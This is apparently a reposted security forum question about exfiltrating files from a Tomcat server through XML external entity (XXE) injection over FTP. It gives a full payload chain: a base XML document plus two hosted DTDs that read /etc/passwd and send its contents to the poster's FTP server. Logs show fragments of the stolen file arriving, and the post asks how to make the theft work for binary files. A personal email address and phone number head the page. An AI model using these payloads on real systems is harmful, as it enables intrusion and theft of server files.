• caglararli@hotmail.com
  • 05386281520

Exfiltration through FTP using XXE on a Tomcat server

Çağlar Arlı      -    35 Views

Exfiltration through FTP using XXE on a Tomcat server

I'm trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I'm hosting two DTD's on Github Gist. These are their contents:

Base XML (What gets sent to the server):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data SYSTEM "https://gist.githubusercontent.com/.../a.dtd">
<a>
<b>&send;</b>
</a>

a.dtd (first DTD payload):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/.../b.dtd">
%dtd;

b.dtd (final DTD payload):

<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://[my server ip]:2121/%file;'>">
%all;

The reason I am trying to extract /etc/passwd is because I am trying to target a binary file, but when that didn't work, I thought I'd start with something simple. I have confirmed that I have access to /etc/passwd (just retrieved it as an entity originally).

The FTP server works fine and I made sure the port was open. This is the output when the above is executed.

[WEB] Starting webserver on 0.0.0.0:8888...
[FTP] Starting FTP server on 0.0.0.0:2121...
[FTP] x has connected
[FTP] Received:
USER anonymous
[FTP] Received:
PASS Java1.8.0_131@
[FTP] > 230 more data please!
[FTP] Received:
TYPE I
[FTP] > 230 more data please!
[FTP] Received:
CWD root:x:0:0:root:
[FTP] > 230 more data please!
[FTP] Received:
CWD root:
[FTP] > 230 more data please!
[FTP] Received:
CWD bin
[FTP] > 230 more data please!
[FTP] Received:
QUIT
[FTP] > 230 more data please!
[FTP] Received:

... (a lot more blank like above)
[FTP] > 230 more data please!
[FTP] Received:

[FTP] > 230 more data please!
[FTP] Client error: [Errno 32] Broken pipe
[FTP] Connection closed with x

An issue I found while answering Luc's question is an interesting one. Basically, if the data has any slashes, the FTP client interprets it as a folder? Unsure why it stops though. Perhaps I have to write a proper response mechanism so when a CWD command comes through I give it OK or another related response.